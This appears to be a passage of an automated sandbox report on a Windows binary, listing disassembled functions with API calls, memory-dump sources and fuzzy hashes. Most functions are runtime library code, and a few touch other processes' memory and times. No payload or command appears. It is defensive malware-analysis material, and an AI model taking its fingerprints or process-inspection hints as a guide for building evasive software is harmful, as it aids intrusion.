                                                                                                                                                                                                                                                                      • ReadProcessMemory.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,?,?,?,00000048,00000000,?,000001D8), ref: 00FB3EB1
                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00FB3F34
                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 00FB3F7B
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: MemoryProcessRead$AddressDirectoryErrorFreeLastLibraryProcSystem_wcschr
                                                                                                                                                                                                                                                                      • String ID: NtQueryInformationProcess$1
                                                                                                                                                                                                                                                                      • API String ID: 566592816-516888619
                                                                                                                                                                                                                                                                      • Opcode ID: 2ee2b2e1484be734a164e9febf6d71f0641a6b25d5ddd6762b78b9e8dc55729d
                                                                                                                                                                                                                                                                      • Instruction ID: 5e0d99eff680ccbdbe2947ff96fc84ca2d019cd3e596f8a1d02d6c1f0d96ef5b
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ee2b2e1484be734a164e9febf6d71f0641a6b25d5ddd6762b78b9e8dc55729d
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B8A14A70D04649DEDB20DF65CC48BEEBBF4BF48314F204599D449A7280EBB5AA88DF91
                                                                                                                                                                                                                                                                      Function 00FC8555 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00FC855C
                                                                                                                                                                                                                                                                      • _Maklocstr.LIBCPMT ref: 00FC85C5
                                                                                                                                                                                                                                                                      • _Maklocstr.LIBCPMT ref: 00FC85D7
                                                                                                                                                                                                                                                                      • _Maklocchr.LIBCPMT ref: 00FC85EF
                                                                                                                                                                                                                                                                      • _Maklocchr.LIBCPMT ref: 00FC85FF
                                                                                                                                                                                                                                                                      • _Getvals.LIBCPMT ref: 00FC8621
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC1CD4: _Maklocchr.LIBCPMT ref: 00FC1D03
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC1CD4: _Maklocchr.LIBCPMT ref: 00FC1D19
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                                                                                                                                                                                                                      • String ID: false$true
                                                                                                                                                                                                                                                                      • API String ID: 3549167292-2658103896
                                                                                                                                                                                                                                                                      • Opcode ID: fa1a893adb53e813f2c860df37aa8e1c478691c7d678ce98396c53cfaa667494
                                                                                                                                                                                                                                                                      • Instruction ID: e7abcff66ea015e47e5f39d761d07645d98a9c285bfc3858f77a38357360354d
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fa1a893adb53e813f2c860df37aa8e1c478691c7d678ce98396c53cfaa667494
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 12219FB2D00308AAEF04EFA1CD86FDE7B68BF05750F04810AF904DF282DA749950DBA1
                                                                                                                                                                                                                                                                      Function 00FB9730 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 398COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • std::locale::_Init.LIBCPMT ref: 00FB9763
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC0C94: __EH_prolog3.LIBCMT ref: 00FC0C9B
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC0C94: std::_Lockit::_Lockit.LIBCPMT ref: 00FC0CA6
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC0C94: std::locale::_Setgloballocale.LIBCPMT ref: 00FC0CC1
                                                                                                                                                                                                                                                                        • Part of subcall function 00FC0C94: std::_Lockit::~_Lockit.LIBCPMT ref: 00FC0D17
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FB978A
                                                                                                                                                                                                                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00FB97F0
                                                                                                                                                                                                                                                                      • std::locale::_Locimp::_Makeloc.LIBCPMT ref: 00FB984A
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBF57A: __EH_prolog3.LIBCMT ref: 00FBF581
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBF57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00FBF5C8
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBF57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00FBF620
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBF57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00FBF654
                                                                                                                                                                                                                                                                        • Part of subcall function 00FBF57A: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 00FBF6A8
                                                                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00000000,?,010054B1,00000000), ref: 00FB99BF
                                                                                                                                                                                                                                                                      • __cftoe.LIBCMT ref: 00FB9B0B
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::locale::_$Locimp::_$AddfacLocimp_std::_$Lockit$H_prolog3Lockit::_$FreeInitLocalLocinfo::_Locinfo_ctorLockit::~_MakelocSetgloballocale__cftoe
                                                                                                                                                                                                                                                                      • String ID: bad locale name
                                                                                                                                                                                                                                                                      • API String ID: 3103716676-1405518554
                                                                                                                                                                                                                                                                      • Opcode ID: e568793273fe2b115ef9468e2715f1ca1a62ac32ae4aa3e58c3e6e8221dfcd81
                                                                                                                                                                                                                                                                      • Instruction ID: e87f02946d847228ce30d3aef8506d2d0a639b6ad8d4342df2f325920699464f
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e568793273fe2b115ef9468e2715f1ca1a62ac32ae4aa3e58c3e6e8221dfcd81
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1F1CD71E04248DFDF10CFA9C984BEEBBB5EF09314F244169E905AB381E7759A04DBA1
                                                                                                                                                                                                                                                                      Function 00FB40B0 Relevance: 12.2, APIs: 8, Instructions: 233memorytimeCOMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,40000022,8F6E4A30,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00FB4154
                                                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,3FFFFFFF,8F6E4A30,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00FB4177
                                                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00FB4217
                                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000400,00000000,?,8F6E4A30,?,?,?), ref: 00FB42D2
                                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000400,00000000,?,?,8F6E4A30,?,?,?), ref: 00FB42F3
                                                                                                                                                                                                                                                                      • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,8F6E4A30,?,?,?), ref: 00FB4326
                                                                                                                                                                                                                                                                      • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,8F6E4A30,?,?,?), ref: 00FB4337
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,8F6E4A30,?,?,?), ref: 00FB4355
                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,8F6E4A30,?,?,?), ref: 00FB4371
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: Process$Local$AllocCloseHandleOpenTimes$Free
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 1424318461-0
                                                                                                                                                                                                                                                                      • Opcode ID: af86cecc41d760f18f239ae808966a8eba2a2b99af31d4e3d3ef3e3b2e9ca38e
                                                                                                                                                                                                                                                                      • Instruction ID: e8f655016fc04fb5fc643b6ca66be69e47bf50c5ec17c560c4a5a1a94b27cf01
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: af86cecc41d760f18f239ae808966a8eba2a2b99af31d4e3d3ef3e3b2e9ca38e
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E6818D71E002099FDB14DFA9D985BEEBBB5FF48320F244229E925E7281D730A901DF94
                                                                                                                                                                                                                                                                      Function 00FD266D Relevance: 12.2, APIs: 8, Instructions: 224COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • GetCPInfo.KERNEL32(?,?,?,?,?), ref: 00FD26F8
                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00FD2786
                                                                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 00FD27B0
                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00FD27F8
                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00FD2812
                                                                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 00FD2838
                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00FD2875
                                                                                                                                                                                                                                                                      • CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00FD2892
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$__alloca_probe_16$CompareInfoString
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 3603178046-0
                                                                                                                                                                                                                                                                      • Opcode ID: f13cdc44816c361276d6ca8ee79cbcd72065a9cf739d2425650f30ddf2d8b1c5
                                                                                                                                                                                                                                                                      • Instruction ID: 0df15144235aee6ca5f92efa9aaa9823af443d3ba4162dab17dd65fda6706a62
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f13cdc44816c361276d6ca8ee79cbcd72065a9cf739d2425650f30ddf2d8b1c5
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B715F72D002499BDF619F64CC85AAE7BBBAF65760F2C015BE914A7350DB35C900F7A0
                                                                                                                                                                                                                                                                      Function 00FD215A Relevance: 12.2, APIs: 8, Instructions: 175COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00FD21A3
                                                                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 00FD21CF
                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00FD220E
                                                                                                                                                                                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00FD222B
                                                                                                                                                                                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00FD226A
                                                                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 00FD2287
                                                                                                                                                                                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00FD22C9
                                                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00FD22EC
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2040435927-0
                                                                                                                                                                                                                                                                      • Opcode ID: aaa572e7fe27f65fb9771f6312e7ca81c6ec92c0c0b7786375778c2f1d7b3d9f
                                                                                                                                                                                                                                                                      • Instruction ID: 346ae29280be15134857077fd0a23ce1e5c532fa045452879fe588748283af36
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aaa572e7fe27f65fb9771f6312e7ca81c6ec92c0c0b7786375778c2f1d7b3d9f
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2251D13290020ABBEB205F64CC45FAF7BAAEF64751F19412AFA11E6250D7348D00FBA0
                                                                                                                                                                                                                                                                      Function 00FB8610 Relevance: 10.7, APIs: 7, Instructions: 157memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FB8657
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FB8679
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FB86A1
                                                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000044,00000000,8F6E4A30,?,00000000), ref: 00FB86F9
                                                                                                                                                                                                                                                                      • __Getctype.LIBCPMT ref: 00FB877B
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FB87E4
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FB880E
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2372200979-0
                                                                                                                                                                                                                                                                      • Opcode ID: 38921d44ed7d8ec583956419e4bc6543d5c1f6610f685fd32c4c602bef1e61df
                                                                                                                                                                                                                                                                      • Instruction ID: 084158e64dc4745271a7bed7f3fa5faad7621fd3a45c08ae53bf2ffaba0570f5
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 38921d44ed7d8ec583956419e4bc6543d5c1f6610f685fd32c4c602bef1e61df
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E461C071D00244CFDB21CF68C941BAAB7F4FF14314F24825DD845AB292EB35AE42DB91
                                                                                                                                                                                                                                                                      Function 00FB9270 Relevance: 10.6, APIs: 7, Instructions: 135memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FB92A0
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FB92C2
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FB92EA
                                                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000018,00000000,8F6E4A30,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00FB9342
                                                                                                                                                                                                                                                                      • __Getctype.LIBCPMT ref: 00FB93BD
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FB93F8
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FB9422
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                      • API String ID: 2372200979-0
                                                                                                                                                                                                                                                                      • Opcode ID: 67a179b17b594ef510d3bfbb8381889b7b93305cfd09b04c024b6f8fd35fcabf
                                                                                                                                                                                                                                                                      • Instruction ID: e170deb31e8edda84786772bb0457828e0424c8583cc101396c7beb02e1357b3
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 67a179b17b594ef510d3bfbb8381889b7b93305cfd09b04c024b6f8fd35fcabf
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D51D070D08259DFCB21CFA8C540B9EBBF4FF04314F14815DD545AB281D7B9AA01EB90
                                                                                                                                                                                                                                                                      Function 00FD3F20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00FD3F57
                                                                                                                                                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00FD3F5F
                                                                                                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00FD3FE8
                                                                                                                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00FD4013
                                                                                                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00FD4068
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                                                                                      • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                      • Opcode ID: c4deb961e50d3c65f86d7c5b0aaa82eda7e992871d3de03cf793fa4a97e3cdd6
                                                                                                                                                                                                                                                                      • Instruction ID: 8d9be8e642f88c1b67982806c95d2358685ed8aa15e497bcd0a5c7b55df80900
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c4deb961e50d3c65f86d7c5b0aaa82eda7e992871d3de03cf793fa4a97e3cdd6
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA418634E0020D9BCF14DF58CC85A9EBBB6EF45324F188156FA149B391D735EA05DB92
                                                                                                                                                                                                                                                                      Function 00FE72FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00FE7408,00FE3841,0000000C,?,00000000,00000000,?,00FE7632,00000021,FlsSetValue,00FFBD58,00FFBD60,?), ref: 00FE73BC
                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087115649.0000000000FB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087162382.0000000000FF7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087188555.000000000100C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.2087204347.0000000001010000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_fb0000_MSIF29D.jbxd
                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                      • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                                                      • Opcode ID: b0383b3603cb59866917e530d825dadda5d94252df7f40576a581ba784e824ce
                                                                                                                                                                                                                                                                      • Instruction ID: efb78dbe9642ad9e4d9239527063faffab8d8a0a234bb973c285bbcb056b4807
                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b0383b3603cb59866917e530d825dadda5d94252df7f40576a581ba784e824ce
                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB210232E09395AFDB62BB66DC41A6A77599F82770F250510FE01A7290EB71ED00F6A0
                                                                                                                                                                                                                                                                      Function 00FBB500 Relevance: 9.2, APIs: 6, Instructions: 151memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FBB531
                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00FBB54F
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FBB577
                                                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,0000000C,00000000,8F6E4A30,?,00000000,00000000), ref: 00FBB5CF
                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00FBB6B7
                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00FBB6E1
                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2087129978.0000000000FB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FB0000, based on PE: true
